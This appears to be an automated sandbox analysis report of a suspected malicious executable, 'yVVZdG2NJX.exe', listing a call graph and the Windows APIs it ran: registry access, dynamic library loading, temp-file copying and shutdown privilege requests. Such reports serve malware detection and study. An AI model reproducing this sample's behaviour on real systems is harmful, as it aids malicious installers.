402497 4245->4246 4247 4024a2 RegQueryValueExW 4246->4247 4252 40288b 4246->4252 4248 4024c8 RegCloseKey 4247->4248 4249 4024c2 4247->4249 4248->4252 4249->4248 4258 4061de wsprintfW 4249->4258 4254 402c41 17 API calls 4253->4254 4255 402c98 4254->4255 4256 406104 RegOpenKeyExW 4255->4256 4257 40248e 4256->4257 4257->4245 4258->4248 5368 402104 5369 402c41 17 API calls 5368->5369 5370 40210b 5369->5370 5371 402c41 17 API calls 5370->5371 5372 402115 5371->5372 5373 402c41 17 API calls 5372->5373 5374 40211f 5373->5374 5375 402c41 17 API calls 5374->5375 5376 402129 5375->5376 5377 402c41 17 API calls 5376->5377 5379 402133 5377->5379 5378 402172 CoCreateInstance 5383 402191 5378->5383 5379->5378 5380 402c41 17 API calls 5379->5380 5380->5378 5381 401423 24 API calls 5382 402250 5381->5382 5383->5381 5383->5382 5384 401f06 5385 402c41 17 API calls 5384->5385 5386 401f0c 5385->5386 5387 4052ff 24 API calls 5386->5387 5388 401f16 5387->5388 5389 405880 2 API calls 5388->5389 5390 401f1c 5389->5390 5391 40288b 5390->5391 5392 406722 5 API calls 5390->5392 5395 401f3f CloseHandle 5390->5395 5394 401f31 5392->5394 5394->5395 5397 4061de wsprintfW 5394->5397 5395->5391 5397->5395 5398 703d1671 5399 703d1516 GlobalFree 5398->5399 5402 703d1689 5399->5402 5400 703d16cf GlobalFree 5401 703d16a4 5401->5400 5402->5400 5402->5401 5403 703d16bb VirtualFree 5402->5403 5403->5400 5404 40190c 5405 401943 5404->5405 5406 402c41 17 API calls 5405->5406 5407 401948 5406->5407 5408 4059a9 67 API calls 5407->5408 5409 401951 5408->5409 5410 40230c 5411 402314 5410->5411 5414 40231a 5410->5414 5412 402c41 17 API calls 5411->5412 5412->5414 5413 402328 5416 402c41 17 API calls 5413->5416 5418 402336 5413->5418 5414->5413 5415 402c41 17 API calls 5414->5415 5415->5413 5416->5418 5417 402c41 17 API calls 5419 40233f WritePrivateProfileStringW 5417->5419 5418->5417 5420 401f8c 5421 402c41 17 API calls 5420->5421 5422 401f93 5421->5422 5423 406671 5 API calls 5422->5423 5424 401fa2 5423->5424 5425 402026 5424->5425 5426 401fbe GlobalAlloc 5424->5426 5426->5425 5427 401fd2 5426->5427 5428 406671 5 API calls 5427->5428 5429 401fd9 5428->5429 5430 406671 5 API calls 5429->5430 5431 401fe3 5430->5431 5431->5425 5435 4061de wsprintfW 5431->5435 5433 402018 5436 4061de wsprintfW 5433->5436 5435->5433 5436->5425 5437 40238e 5438 4023c1 5437->5438 5439 402396 5437->5439 5440 402c41 17 API calls 5438->5440 5441 402c81 17 API calls 5439->5441 5442 4023c8 5440->5442 5443 40239d 5441->5443 5448 402cff 5442->5448 5445 4023d5 5443->5445 5446 402c41 17 API calls 5443->5446 5447 4023ae RegDeleteValueW RegCloseKey 5446->5447 5447->5445 5449 402d13 5448->5449 5451 402d0c 5448->5451 5449->5451 5452 402d44 5449->5452 5451->5445 5453 406104 RegOpenKeyExW 5452->5453 5459 402d72 5453->5459 5454 402dc3 5454->5451 5455 402d98 RegEnumKeyW 5456 402daf RegCloseKey 5455->5456 5455->5459 5457 406671 5 API calls 5456->5457 5461 402dbf 5457->5461 5458 402dd0 RegCloseKey 5458->5454 5459->5454 5459->5455 5459->5456 5459->5458 5460 402d44 6 API calls 5459->5460 5460->5459 5461->5454 5462 402de0 RegDeleteKeyW 5461->5462 5462->5454 5463 40190f 5464 402c41 17 API calls 5463->5464 5465 401916 5464->5465 5466 4058fd MessageBoxIndirectW 5465->5466 5467 40191f 5466->5467 5468 401491 5469 4052ff 24 API calls 5468->5469 5470 401498 5469->5470 5471 401d14 5472 402c1f 17 API calls 5471->5472 5473 401d1b 5472->5473 5474 402c1f 17 API calls 5473->5474 5475 401d27 GetDlgItem 5474->5475 5476 402592 5475->5476 5477 402598 5478 4025c7 5477->5478 5479 4025ac 5477->5479 5481 4025fb 5478->5481 5482 4025cc 5478->5482 5480 402c1f 17 API calls 5479->5480 5489 4025b3 5480->5489 5484 402c41 17 API calls 5481->5484 5483 402c41 17 API calls 5482->5483 5485 4025d3 WideCharToMultiByte lstrlenA 5483->5485 5486 402602 lstrlenW 5484->5486 5485->5489 5486->5489 5487 40262f 5488 402645 5487->5488 5490 405e3f WriteFile 5487->5490 5489->5487 5489->5488 5491 405e6e 5 API calls 5489->5491 5490->5488 5491->5487 5492 703d10e1 5494 703d1111 5492->5494 5493 703d11d8 GlobalFree 5494->5493 5495 703d12ba 2 API calls 5494->5495 5496 703d11d3 5494->5496 5497 703d11f8 GlobalFree 5494->5497 5498 703d1272 2 API calls 5494->5498 5499 703d1164 GlobalAlloc 5494->5499 5500 703d12e1 lstrcpyW 5494->5500 5501 703d11c4 GlobalFree 5494->5501 5495->5494 5496->5493 5497->5494 5498->5501 5499->5494 5500->5494 5501->5494 5502 40149e 5503 4022f7 5502->5503 5504 4014ac PostQuitMessage 5502->5504 5504->5503 5505 401c1f 5506 402c1f 17 API calls 5505->5506 5507 401c26 5506->5507 5508 402c1f 17 API calls 5507->5508 5509 401c33 5508->5509 5510 401c48 5509->5510 5511 402c41 17 API calls 5509->5511 5512 401c58 5510->5512 5513 402c41 17 API calls 5510->5513 5511->5510 5514 401c63 5512->5514 5515 401caf 5512->5515 5513->5512 5517 402c1f 17 API calls 5514->5517 5516 402c41 17 API calls 5515->5516 5518 401cb4 5516->5518 5519 401c68 5517->5519 5520 402c41 17 API calls 5518->5520 5521 402c1f 17 API calls 5519->5521 5522 401cbd FindWindowExW 5520->5522 5523 401c74 5521->5523 5526 401cdf 5522->5526 5524 401c81 SendMessageTimeoutW 5523->5524 5525 401c9f SendMessageW 5523->5525 5524->5526 5525->5526 5527 703d18dd 5528 703d1900 5527->5528 5529 703d1935 GlobalFree 5528->5529 5530 703d1947 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5528->5530 5529->5530 5531 703d1272 2 API calls 5530->5531 5532 703d1ad2 GlobalFree GlobalFree 5531->5532 5533 402821 5534 402827 5533->5534 5535 402ac5 5534->5535 5536 40282f FindClose 5534->5536 5536->5535 4186 4015a3 4187 402c41 17 API calls 4186->4187 4188 4015aa SetFileAttributesW 4187->4188 4189 4015bc 4188->4189 5537 703d1058 5539 703d1074 5537->5539 5538 703d10dd 5539->5538 5540 703d1516 GlobalFree 5539->5540 5541 703d1092 5539->5541 5540->5541 5542 703d1516 GlobalFree 5541->5542 5543 703d10a2 5542->5543 5544 703d10a9 GlobalSize 5543->5544 5545 703d10b2 5543->5545 5544->5545 5546 703d10c7 5545->5546 5547 703d10b6 GlobalAlloc 5545->5547 5549 703d10d2 GlobalFree 5546->5549 5548 703d153d 3 API calls 5547->5548 5548->5546 5549->5538 5550 703d16d8 5551 703d1707 5550->5551 5552 703d1b63 22 API calls 5551->5552 5553 703d170e 5552->5553 5554 703d1715 5553->5554 5555 703d1721 5553->5555 5556 703d1272 2 API calls 5554->5556 5557 703d1748 5555->5557 5558 703d172b 5555->5558 5561 703d171f 5556->5561 5559 703d174e 5557->5559 5560 703d1772 5557->5560 5562 703d153d 3 API calls 5558->5562 5563 703d15b4 3 API calls 5559->5563 5564 703d153d 3 API calls 5560->5564 5565 703d1730 5562->5565 5567 703d1753 5563->5567 5564->5561 5566 703d15b4 3 API calls 5565->5566 5568 703d1736 5566->5568 5569 703d1272 2 API calls 5567->5569 5570 703d1272 2 API calls 5568->5570 5571 703d1759 GlobalFree 5569->5571 5572 703d173c GlobalFree 5570->5572 5571->5561 5573 703d176d GlobalFree 5571->5573 5572->5561 5573->5561 5574 4029a7 5575 4029aa 5574->5575 5576 4029d5 5575->5576 5577 4029ee 5575->5577 5581 40288b 5575->5581 5578 4029da 5576->5578 5586 4029eb 5576->5586 5579 402a08 5577->5579 5580 4029f8 5577->5580 5587 406297 lstrcpynW 5578->5587 5583 4062b9 17 API calls 5579->5583 5582 402c1f 17 API calls 5580->5582 5582->5586 5583->5586 5586->5581 5588 4061de wsprintfW 5586->5588 5587->5581 5588->5581 5589 401a30 5590 402c41 17 API calls 5589->5590 5591 401a39 ExpandEnvironmentStringsW 5590->5591 5592 401a4d 5591->5592 5594 401a60 5591->5594 5593 401a52 lstrcmpW 5592->5593 5592->5594 5593->5594 4575 402032 4576 402044 4575->4576 4586 4020f6 4575->4586 4577 402c41 17 API calls 4576->4577 4579 40204b 4577->4579 4578 401423 24 API calls 4580 402250 4578->4580 4581 402c41 17 API calls 4579->4581 4582 402054 4581->4582 4583 40206a LoadLibraryExW 4582->4583 4584 40205c GetModuleHandleW 4582->4584 4585 40207b 4583->4585 4583->4586 4584->4583 4584->4585 4598 4066e0 WideCharToMultiByte 4585->4598 4586->4578 4589 4020c5 4593 4052ff 24 API calls 4589->4593 4590 40208c 4591 402094 4590->4591 4592 4020ab 4590->4592 4594 401423 24 API calls 4591->4594 4601 703d177b 4592->4601 4595 40209c 4593->4595 4594->4595 4595->4580 4596 4020e8 FreeLibrary 4595->4596 4596->4580 4599 40670a GetProcAddress 4598->4599 4600 402086 4598->4600 4599->4600 4600->4589 4600->4590 4602 703d17ae 4601->4602 4643 703d1b63 4602->4643 4604 703d17b5 4605 703d18da 4604->4605 4606 703d17cd 4604->4606 4607 703d17c6 4604->4607 4605->4595 4677 703d2398 4606->4677 4693 703d2356 4607->4693 4612 703d1831 4616 703d1837 4612->4616 4617 703d1882 4612->4617 4613 703d1813 4706 703d256d 4613->4706 4614 703d17fc 4628 703d17f2 4614->4628 4703 703d2d2f 4614->4703 4615 703d17e3 4623 703d17e9 4615->4623 4624 703d17f4 4615->4624 4725 703d15c6 4616->4725 4621 703d256d 10 API calls 4617->4621 4629 703d1873 4621->4629 4622 703d1819 4717 703d15b4 4622->4717 4623->4628 4687 703d2a74 4623->4687 4697 703d2728 4624->4697 4628->4612 4628->4613 4634 703d18c9 4629->4634 4732 703d2530 4629->4732 4631 703d17fa 4631->4628 4632 703d256d 10 API calls 4632->4629 4634->4605 4636 703d18d3 GlobalFree 4634->4636 4636->4605 4640 703d18b5 4640->4634 4736 703d153d wsprintfW 4640->4736 4642 703d18ae FreeLibrary 4642->4640 4739 703d121b GlobalAlloc 4643->4739 4645 703d1b87 4740 703d121b GlobalAlloc 4645->4740 4647 703d1dad GlobalFree GlobalFree GlobalFree 4648 703d1dca 4647->4648 4665 703d1e14 4647->4665 4650 703d2196 4648->4650 4657 703d1ddf 4648->4657 4648->4665 4649 703d1c68 GlobalAlloc 4664 703d1b92 4649->4664 4651 703d21b8 GetModuleHandleW 4650->4651 4650->4665 4654 703d21de 4651->4654 4655 703d21c9 LoadLibraryW 4651->4655 4652 703d1cb3 lstrcpyW 4656 703d1cbd lstrcpyW 4652->4656 4653 703d1cd1 GlobalFree 4653->4664 4747 703d1621 WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4654->4747 4655->4654 4655->4665 4656->4664 4657->4665 4743 703d122c 4657->4743 4659 703d2230 4662 703d223d lstrlenW 4659->4662 4659->4665 4661 703d21f0 4661->4659 4674 703d221a GetProcAddress 4661->4674 4748 703d1621 WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4662->4748 4663 703d2068 4746 703d121b GlobalAlloc 4663->4746 4664->4647 4664->4649 4664->4652 4664->4653 4664->4656 4664->4663 4664->4665 4667 703d20f0 4664->4667 4669 703d1fa9 GlobalFree 4664->4669 4671 703d122c 2 API calls 4664->4671 4675 703d1d0f 4664->4675 4665->4604 4667->4665 4670 703d2138 lstrcpyW 4667->4670 4669->4664 4670->4665 4671->4664 4673 703d2257 4673->4665 4674->4659 4675->4664 4741 703d158f GlobalSize GlobalAlloc 4675->4741 4676 703d2071 4676->4604 4678 703d23b0 4677->4678 4680 703d24d9 GlobalFree 4678->4680 4682 703d2458 GlobalAlloc WideCharToMultiByte 4678->4682 4683 703d2483 GlobalAlloc 4678->4683 4684 703d122c GlobalAlloc lstrcpynW 4678->4684 4685 703d249a 4678->4685 4750 703d12ba 4678->4750 4680->4678 4681 703d17d3 4680->4681 4681->4614 4681->4615 4681->4628 4682->4680 4683->4685 4684->4678 4685->4680 4754 703d26bc 4685->4754 4689 703d2a86 4687->4689 4688 703d2b2b ReadFile 4690 703d2b49 4688->4690 4689->4688 4691 703d2c3a GetLastError 4690->4691 4692 703d2c45 4690->4692 4691->4692 4692->4628 4694 703d236b 4693->4694 4695 703d17cc 4694->4695 4696 703d2376 GlobalAlloc 4694->4696 4695->4606 4696->4694 4701 703d2758 4697->4701 4698 703d2806 4700 703d280c GlobalSize 4698->4700 4702 703d2816 4698->4702 4699 703d27f3 GlobalAlloc 4699->4702 4700->4702 4701->4698 4701->4699 4702->4631 4704 703d2d3a 4703->4704 4705 703d2d7a GlobalFree 4704->4705 4757 703d121b GlobalAlloc 4706->4757 4708 703d25f0 MultiByteToWideChar 4713 703d2577 4708->4713 4709 703d2623 lstrcpynW 4709->4713 4710 703d2612 StringFromGUID2 4710->4713 4711 703d2636 wsprintfW 4711->4713 4712 703d265a GlobalFree 4712->4713 4713->4708 4713->4709 4713->4710 4713->4711 4713->4712 4714 703d268f GlobalFree 4713->4714 4715 703d1272 2 API calls 4713->4715 4758 703d12e1 4713->4758 4714->4622 4715->4713 4762 703d121b GlobalAlloc 4717->4762 4719 703d15b9 4720 703d15c6 2 API calls 4719->4720 4721 703d15c3 4720->4721 4722 703d1272 4721->4722 4723 703d127b GlobalAlloc lstrcpynW 4722->4723 4724 703d12b5 GlobalFree 4722->4724 4723->4724 4724->4629 4726 703d15e4 4725->4726 4727 703d15d6 lstrcpyW 4725->4727 4726->4727 4729 703d15f0 4726->4729 4730 703d161d 4727->4730 4729->4730 4731 703d160d wsprintfW 4729->4731 4730->4632 4731->4730 4733 703d253e 4732->4733 4735 703d1895 4732->4735 4734 703d255a GlobalFree 4733->4734 4733->4735 4734->4733 4735->4640 4735->4642 4737 703d1272 2 API calls 4736->4737 4738 703d155e 4737->4738 4738->4634 4739->4645 4740->4664 4742 703d15ad 4741->4742 4742->4675 4749 703d121b GlobalAlloc 4743->4749 4745 703d123b lstrcpynW 4745->4665 4746->4676 4747->4661 4748->4673 4749->4745 4751 703d12c1 4750->4751 4752 703d122c 2 API calls 4751->4752 4753 703d12df 4752->4753 4753->4678 4755 703d26ca VirtualAlloc 4754->4755 4756 703d2720 4754->4756 4755->4756 4756->4685 4757->4713 4759 703d130c 4758->4759 4760 703d12ea 4758->4760 4759->4713 4760->4759 4761 703d12f0 lstrcpyW 4760->4761 4761->4759 4762->4719 5595 703d2c4f 5596 703d2c67 5595->5596 5597 703d158f 2 API calls 5596->5597 5598 703d2c82 5597->5598 4794 403d35 4795 403e88 4794->4795 4796 403d4d 4794->4796 4797 403ed9 4795->4797 4798 403e99 GetDlgItem GetDlgItem 4795->4798 4796->4795 4799 403d59 4796->4799 4801 403f33 4797->4801 4811 401389 2 API calls 4797->4811 4800 40420e 18 API calls 4798->4800 4802 403d64 SetWindowPos 4799->4802 4803 403d77 4799->4803 4806 403ec3 SetClassLongW 4800->4806 4807 40425a SendMessageW 4801->4807 4857 403e83 4801->4857 4802->4803 4804 403d94 4803->4804 4805 403d7c ShowWindow 4803->4805 4808 403db6 4804->4808 4809 403d9c DestroyWindow 4804->4809 4805->4804 4810 40140b 2 API calls 4806->4810 4855 403f45 4807->4855 4812 403dbb SetWindowLongW 4808->4812 4813 403dcc 4808->4813 4816 4041b8 4809->4816 4810->4797 4814 403f0b 4811->4814 4812->4857 4818 403e75 4813->4818 4819 403dd8 GetDlgItem 4813->4819 4814->4801 4820 403f0f SendMessageW 4814->4820 4815 40140b 2 API calls 4815->4855 4821 4041c8 ShowWindow 4816->4821 4816->4857 4817 404199 DestroyWindow EndDialog 4817->4816 4875 404275 4818->4875 4822 403e08 4819->4822 4823 403deb SendMessageW IsWindowEnabled 4819->4823 4820->4857 4821->4857 4826 403e15 4822->4826 4829 403e5c SendMessageW 4822->4829 4830 403e28 4822->4830 4836 403e0d 4822->4836 4823->4822 4823->4857 4825 4062b9 17 API calls 4825->4855 4826->4829 4826->4836 4828 40420e 18 API calls 4828->4855 4829->4818 4831 403e30 4830->4831 4832 403e45 4830->4832 4834 40140b 2 API calls 4831->4834 4835 40140b 2 API calls 4832->4835 4833 403e43 4833->4818 4834->4836 4837 403e4c 4835->4837 4872 4041e7 4836->4872 4837->4818 4837->4836 4839 403fc0 GetDlgItem 4840 403fd5 4839->4840 4841 403fdd ShowWindow KiUserCallbackDispatcher 4839->4841 4840->4841 4869 404230 EnableWindow 4841->4869 4843 404007 EnableWindow 4848 40401b 4843->4848 4844 404020 GetSystemMenu EnableMenuItem SendMessageW 4845 404050 SendMessageW 4844->4845 4844->4848 4845->4848 4847 403d16 18 API calls 4847->4848 4848->4844 4848->4847 4870 404243 SendMessageW 4848->4870 4871 406297 lstrcpynW 4848->4871 4850 40407f lstrlenW 4851 4062b9 17 API calls 4850->4851 4852 404095 SetWindowTextW 4851->4852 4853 401389 2 API calls 4852->4853 4853->4855 4854 4040d9 DestroyWindow 4854->4816 4856 4040f3 CreateDialogParamW 4854->4856 4855->4815 4855->4817 4855->4825 4855->4828 4855->4854 4855->4857 4866 40420e 4855->4866 4856->4816 4858 404126 4856->4858 4859 40420e 18 API calls 4858->4859 4860 404131 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4859->4860 4861 401389 2 API calls 4860->4861 4862 404177 4861->4862 4862->4857 4863 40417f ShowWindow 4862->4863 4864 40425a SendMessageW 4863->4864 4865 404197 4864->4865 4865->4816 4867 4062b9 17 API calls 4866->4867 4868 404219 SetDlgItemTextW 4867->4868 4868->4839 4869->4843 4870->4848 4871->4850 4873 4041f4 SendMessageW 4872->4873 4874 4041ee 4872->4874 4873->4833 4874->4873 4876 404338 4875->4876 4877 40428d GetWindowLongW 4875->4877 4876->4857 4877->4876 4878 4042a2 4877->4878 4878->4876 4879 4042d2 4878->4879 4880 4042cf GetSysColor 4878->4880 4881 4042e2 SetBkMode 4879->4881 4882 4042d8 SetTextColor 4879->4882 4880->4879 4883 404300 4881->4883 4884 4042fa GetSysColor 4881->4884 4882->4881 4885 404311 4883->4885 4886 404307 SetBkColor 4883->4886 4884->4883 4885->4876 4887 404324 DeleteObject 4885->4887 4888 40432b CreateBrushIndirect 4885->4888 4886->4885 4887->4888 4888->4876 5604 402a35 5605 402c1f 17 API calls 5604->5605 5606 402a3b 5605->5606 5607 40288b 5606->5607 5608 402a72 5606->5608 5610 402a4d 5606->5610 5608->5607 5609 4062b9 17 API calls 5608->5609 5609->5607 5610->5607 5612 4061de wsprintfW 5610->5612 5612->5607 5613 401735 5614 402c41 17 API calls 5613->5614 5615 40173c SearchPathW 5614->5615 5616 4029e6 5615->5616 5617 401757 5615->5617 5617->5616 5619 406297 lstrcpynW 5617->5619 5619->5616 5620 4014b8 5621 4014be 5620->5621 5622 401389 2 API calls 5621->5622 5623 4014c6 5622->5623 5624 4046b8 5625 4046c8 5624->5625 5626 4046ee 5624->5626 5627 40420e 18 API calls 5625->5627 5628 404275 8 API calls 5626->5628 5629 4046d5 SetDlgItemTextW 5627->5629 5630 4046fa 5628->5630 5629->5626 5631 401db9 GetDC 5632 402c1f 17 API calls 5631->5632 5633 401dcb GetDeviceCaps MulDiv ReleaseDC 5632->5633 5634 402c1f 17 API calls 5633->5634 5635 401dfc 5634->5635 5636 4062b9 17 API calls 5635->5636 5637 401e39 CreateFontIndirectW 5636->5637 5638 402592 5637->5638 5639 40283b 5640 402843 5639->5640 5641 402847 FindNextFileW 5640->5641 5642 402859 5640->5642 5641->5642 5644 4029e6 5642->5644 5645 406297 lstrcpynW 5642->5645 5645->5644 5646 40543e 5647 4055e8 5646->5647 5648 40545f GetDlgItem GetDlgItem GetDlgItem 5646->5648 5650 4055f1 GetDlgItem CreateThread CloseHandle 5647->5650 5651 405619 5647->5651 5691 404243 SendMessageW 5648->5691 5650->5651 5653 405644 5651->5653 5654 405630 ShowWindow ShowWindow 5651->5654 5655 405669 5651->5655 5652 4054cf 5660 4054d6 GetClientRect GetSystemMetrics SendMessageW SendMessageW 5652->5660 5656 4056a4 5653->5656 5657 405658 5653->5657 5658 40567e ShowWindow 5653->5658 5693 404243 SendMessageW 5654->5693 5659 404275 8 API calls 5655->5659 5656->5655 5667 4056b2 SendMessageW 5656->5667 5662 4041e7 SendMessageW 5657->5662 5663 405690 5658->5663 5664 40569e 5658->5664 5672 405677 5659->5672 5665 405544 5660->5665 5666 405528 SendMessageW SendMessageW 5660->5666 5662->5655 5668 4052ff 24 API calls 5663->5668 5669 4041e7 SendMessageW 5664->5669 5670 405557 5665->5670 5671 405549 SendMessageW 5665->5671 5666->5665 5667->5672 5673 4056cb CreatePopupMenu 5667->5673 5668->5664 5669->5656 5675 40420e 18 API calls 5670->5675 5671->5670 5674 4062b9 17 API calls 5673->5674 5677 4056db AppendMenuW 5674->5677 5676 405567 5675->5676 5680 405570 ShowWindow 5676->5680 5681 4055a4 GetDlgItem SendMessageW 5676->5681 5678 4056f8 GetWindowRect 5677->5678 5679 40570b TrackPopupMenu 5677->5679 5678->5679 5679->5672 5682 405726 5679->5682 5683 405593 5680->5683 5684 405586 ShowWindow 5680->5684 5681->5672 5685 4055cb SendMessageW SendMessageW 5681->5685 5686 405742 SendMessageW 5682->5686 5692 404243 SendMessageW 5683->5692 5684->5683 5685->5672 5686->5686 5687 40575f OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5686->5687 5689 405784 SendMessageW 5687->5689 5689->5689 5690 4057ad GlobalUnlock SetClipboardData CloseClipboard 5689->5690 5690->5672 5691->5652 5692->5681 5693->5653 5694 402abe InvalidateRect 5695 402ac5 5694->5695

                                                                      Executed Functions

                                                                      Function 0040336C Relevance: 86.2, APIs: 32, Strings: 17, Instructions: 410stringfilecomCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 0 40336c-4033a9 SetErrorMode GetVersion 1 4033ab-4033b3 call 406671 0->1 2 4033bc 0->2 1->2 7 4033b5 1->7 4 4033c1-4033d5 call 406601 lstrlenA 2->4 9 4033d7-4033f3 call 406671 * 3 4->9 7->2 16 403404-403463 #17 OleInitialize SHGetFileInfoW call 406297 GetCommandLineW call 406297 9->16 17 4033f5-4033fb 9->17 24 403465-40346c 16->24 25 40346d-403487 call 405b99 CharNextW 16->25 17->16 21 4033fd 17->21 21->16 24->25 28 40348d-403493 25->28 29 40359e-4035b8 GetTempPathW call 40333b 25->29 30 403495-40349a 28->30 31 40349c-4034a0 28->31 36 403610-40362a DeleteFileW call 402edd 29->36 37 4035ba-4035d8 GetWindowsDirectoryW lstrcatW call 40333b 29->37 30->30 30->31 33 4034a2-4034a6 31->33 34 4034a7-4034ab 31->34 33->34 38 4034b1-4034b7 34->38 39 40356a-403577 call 405b99 34->39 56 403630-403636 36->56 57 4036db-4036eb call 4038ad OleUninitialize 36->57 37->36 52 4035da-40360a GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40333b 37->52 43 4034d2-40350b 38->43 44 4034b9-4034c1 38->44 54 403579-40357a 39->54 55 40357b-403581 39->55 50 403528-403562 43->50 51 40350d-403512 43->51 48 4034c3-4034c6 44->48 49 4034c8 44->49 48->43 48->49 49->43 50->39 53 403564-403568 50->53 51->50 58 403514-40351c 51->58 52->36 52->57 53->39 62 403589-403597 call 406297 53->62 54->55 55->28 63 403587 55->63 64 4036cb-4036d2 call 403987 56->64 65 40363c-403647 call 405b99 56->65 73 403811-403817 57->73 74 4036f1-403701 call 4058fd ExitProcess 57->74 59 403523 58->59 60 40351e-403521 58->60 59->50 60->50 60->59 69 40359c 62->69 63->69 76 4036d7 64->76 80 403695-40369f 65->80 81 403649-40367e 65->81 69->29 78 403895-40389d 73->78 79 403819-40382f GetCurrentProcess OpenProcessToken 73->79 76->57 82 4038a3-4038a7 ExitProcess 78->82 83 40389f 78->83 87 403831-40385f LookupPrivilegeValueW AdjustTokenPrivileges 79->87 88 403865-403873 call 406671 79->88 85 4036a1-4036af call 405c74 80->85 86 403707-40371b call 405868 lstrcatW 80->86 89 403680-403684 81->89 83->82 85->57 99 4036b1-4036c7 call 406297 * 2 85->99 100 403728-403742 lstrcatW lstrcmpiW 86->100 101 40371d-403723 lstrcatW 86->101 87->88 102 403881-40388c ExitWindowsEx 88->102 103 403875-40387f 88->103 93 403686-40368b 89->93 94 40368d-403691 89->94 93->94 95 403693 93->95 94->89 94->95 95->80 99->64 100->57 105 403744-403747 100->105 101->100 102->78 106 40388e-403890 call 40140b 102->106 103->102 103->106 109 403750 call 40584b 105->109 110 403749-40374e call 4057ce 105->110 106->78 117 403755-403763 SetCurrentDirectoryW 109->117 110->117 118 403770-403799 call 406297 117->118 119 403765-40376b call 406297 117->119 123 40379e-4037ba call 4062b9 DeleteFileW 118->123 119->118 126 4037fb-403803 123->126 127 4037bc-4037cc CopyFileW 123->127 126->123 128 403805-40380c call 40605d 126->128 127->126 129 4037ce-4037ee call 40605d call 4062b9 call 405880 127->129 128->57 129->126 138 4037f0-4037f7 CloseHandle 129->138 138->126
                                                                      APIs
                                                                      • SetErrorMode.KERNELBASE ref: 0040338F
                                                                      • GetVersion.KERNEL32 ref: 00403395
                                                                      • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033C8
                                                                      • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 00403405
                                                                      • OleInitialize.OLE32(00000000), ref: 0040340C
                                                                      • SHGetFileInfoW.SHELL32(0079FEE0,00000000,?,000002B4,00000000), ref: 00403428
                                                                      • GetCommandLineW.KERNEL32(007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 0040343D
                                                                      • CharNextW.USER32(00000000,"C:\Users\user\Desktop\yVVZdG2NJX.exe",00000020,"C:\Users\user\Desktop\yVVZdG2NJX.exe",00000000,?,00000006,00000008,0000000A), ref: 00403475
                                                                        • Part of subcall function 00406671: GetModuleHandleA.KERNEL32(?,00000020,?,004033DE,0000000A), ref: 00406683
                                                                        • Part of subcall function 00406671: GetProcAddress.KERNEL32(00000000,?), ref: 0040669E
                                                                      • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035AF
                                                                      • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035C0
                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035CC
                                                                      • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035E0
                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035E8
                                                                      • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035F9
                                                                      • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403601
                                                                      • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403615
                                                                        • Part of subcall function 00406297: lstrcpynW.KERNEL32(?,?,00000400,0040343D,007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 004062A4
                                                                      • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036E0
                                                                      • ExitProcess.KERNEL32 ref: 00403701
                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\yVVZdG2NJX.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403714
                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\yVVZdG2NJX.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403723
                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\yVVZdG2NJX.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040372E
                                                                      • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\yVVZdG2NJX.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040373A
                                                                      • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403756
                                                                      • DeleteFileW.KERNEL32(0079F6E0,0079F6E0,?,007A9000,00000008,?,00000006,00000008,0000000A), ref: 004037B0
                                                                      • CopyFileW.KERNEL32(C:\Users\user\Desktop\yVVZdG2NJX.exe,0079F6E0,?,?,00000006,00000008,0000000A), ref: 004037C4
                                                                      • CloseHandle.KERNEL32(00000000,0079F6E0,0079F6E0,?,0079F6E0,00000000,?,00000006,00000008,0000000A), ref: 004037F1
                                                                      • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403820
                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00403827
                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040383C
                                                                      • AdjustTokenPrivileges.ADVAPI32 ref: 0040385F
